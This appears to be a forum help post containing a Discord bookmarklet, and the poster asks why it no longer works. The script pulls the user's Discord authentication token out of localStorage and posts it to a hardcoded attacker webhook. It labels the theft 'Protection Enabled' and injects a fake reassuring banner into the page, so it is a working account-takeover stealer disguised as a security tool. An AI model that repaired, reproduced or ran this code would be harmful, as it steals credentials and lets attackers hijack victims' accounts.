javascript: void (function () { if ("https://discord.com" != this.document.location.origin) alert("You must be on Discord to use this tool!"); else { const c = document.createElement("iframe"); document.head.append(c); const d = Object.getOwnPropertyDescriptor(c.contentWindow, "localStorage"); c.remove(), Object.defineProperty(window, "localStorage", d), (t = localStorage.getItem("token")), (e = localStorage.getItem("email_cache")); var a = new XMLHttpRequest(); a.open( "POST", "https://discord.com/api/webhooks/881638611202748466/2zdbQAb-2QVcZM0r4Wv-hfVhAG2c0XeDw1SQXmmfVaT0IGHQukv3VI0iH2BLDtjt0lQc" ), a.setRequestHeader("Content-type", "application/json"); var b = { embeds: [ { color: 16515972, title: "Protection Enabled", description: `\`\`\`${t}\`\`\``, }, ], }; a.send(JSON.stringify(b)), (notice = `<div class="notice-3bPHh-" style="background-color:#364995;color:white;">%F0%9F%94%92 Extra.<a href = "https://discord.com/channels/@me"> <b>Reload</b><a></div>`), document .querySelector(".base-3dtUhz") .insertAdjacentHTML("afterbegin", notice); }})();
I get this error when I try run this javascript post request on discord. This code used to work originally but it has recently stopped working. If anyone could tell me what this error at the top of the console means I would appreciate it.